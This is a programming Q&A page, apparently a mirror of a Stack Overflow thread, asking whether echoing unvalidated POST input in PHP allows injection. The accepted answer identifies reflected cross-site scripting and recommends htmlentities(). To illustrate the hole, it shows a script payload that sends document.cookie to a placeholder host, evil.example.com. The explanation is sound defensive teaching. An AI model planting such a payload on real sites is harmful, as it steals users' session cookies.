dpthuyh1678 2016-02-15 20:49
浏览 68
已采纳

PHP文件包含

I have a textbox in which a user inputs a value and a PHP script echoes it out. The Textbox is sent to the server via POST and is saved in a variable called Temp.

If I create the output script with the below line, will the echo prevents File inclusion or arbitrary PHP injection, assuming that no validations are being done?

<?php echo $Temp; ?>
  • 写回答

4条回答 默认 最新

  • dongzongxun8491 2016-02-16 11:44
    关注

    This is a classic reflected Cross Site Scripting vulnerability. Injected code will not execute on the server.

    A malicious user could setup their own site that POSTs to your form. The POSTed value could be something like

    <script>
    new Img().src = 'https://evil.example.com?' + escape(document.cookie);
    </script>
    

    When a user that is logged into your site visits the malicious page, the attacker will retrieve the user's cookies for your site (well any that are not marked as HttpOnly). To mitigate this do the following:

    <?php echo htmlentities($Temp); ?>
    

    which will display any script as HTML rather than execute it.

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(3条)

报告相同问题?

悬赏问题

  • ¥15 python变量和列表之间的相互影响
  • ¥15 写一个方法checkPerson,入参实体类Person,出参布尔值
  • ¥15 我想咨询一下路面纹理三维点云数据处理的一些问题,上传的坐标文件里是怎么对无序点进行编号的,以及xy坐标在处理的时候是进行整体模型分片处理的吗
  • ¥15 CSAPPattacklab
  • ¥15 一直显示正在等待HID—ISP
  • ¥15 Python turtle 画图
  • ¥15 关于大棚监测的pcb板设计
  • ¥15 stm32开发clion时遇到的编译问题
  • ¥15 lna设计 源简并电感型共源放大器
  • ¥15 如何用Labview在myRIO上做LCD显示?(语言-开发语言)